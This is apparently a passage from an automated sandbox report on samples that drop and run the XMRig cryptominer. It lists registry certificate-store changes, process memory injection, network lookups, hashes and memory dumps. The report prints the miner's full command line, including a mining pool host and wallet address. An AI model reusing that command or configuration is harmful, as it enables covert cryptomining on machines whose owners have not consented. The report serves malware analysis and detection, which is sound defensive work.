b8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1456 wrote to memory of 4908 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1456 wrote to memory of 4908 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4908-16-0x00000284B1620000-0x00000284B1640000-memory.dmp
memory/4908-17-0x00000284B1670000-0x00000284B1690000-memory.dmp
memory/4908-18-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-21-0x00000284B16B0000-0x00000284B16D0000-memory.dmp
memory/4908-20-0x00000284B1690000-0x00000284B16B0000-memory.dmp
memory/4908-19-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-22-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-23-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-24-0x00000284B1690000-0x00000284B16B0000-memory.dmp
memory/4908-25-0x00000284B16B0000-0x00000284B16D0000-memory.dmp
memory/4908-26-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-27-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-28-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-29-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-30-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-31-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-32-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-33-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-34-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-35-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-36-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-37-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-38-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-39-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-40-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-41-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-42-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-43-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-44-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-45-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-46-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-47-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-48-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-49-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-50-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-51-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-52-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-53-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-54-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-55-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-56-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-57-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-58-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-59-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-60-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-61-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-62-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-63-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-64-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-65-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-66-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-67-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-68-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-69-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-70-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-71-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-72-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-73-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-74-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-75-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-76-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-77-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-78-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-79-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-80-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-81-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-82-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-83-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-84-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:05
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3856 wrote to memory of 1232 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3856 wrote to memory of 1232 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1232-16-0x000002AC07870000-0x000002AC07890000-memory.dmp
memory/1232-17-0x000002AC09270000-0x000002AC09290000-memory.dmp
memory/1232-18-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-20-0x000002AC092B0000-0x000002AC092D0000-memory.dmp
memory/1232-19-0x000002AC09290000-0x000002AC092B0000-memory.dmp
memory/1232-21-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-22-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-25-0x000002AC092B0000-0x000002AC092D0000-memory.dmp
memory/1232-24-0x000002AC09290000-0x000002AC092B0000-memory.dmp
memory/1232-23-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-26-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-27-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-28-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-29-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-30-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-31-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-32-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-33-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-34-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-35-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-36-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-37-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-38-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-39-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-40-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-41-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-42-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-43-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-44-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-45-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-46-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-47-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-48-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-49-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-50-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-51-0x00007FF605320000-0x00007FF605E23000-memory.dmp
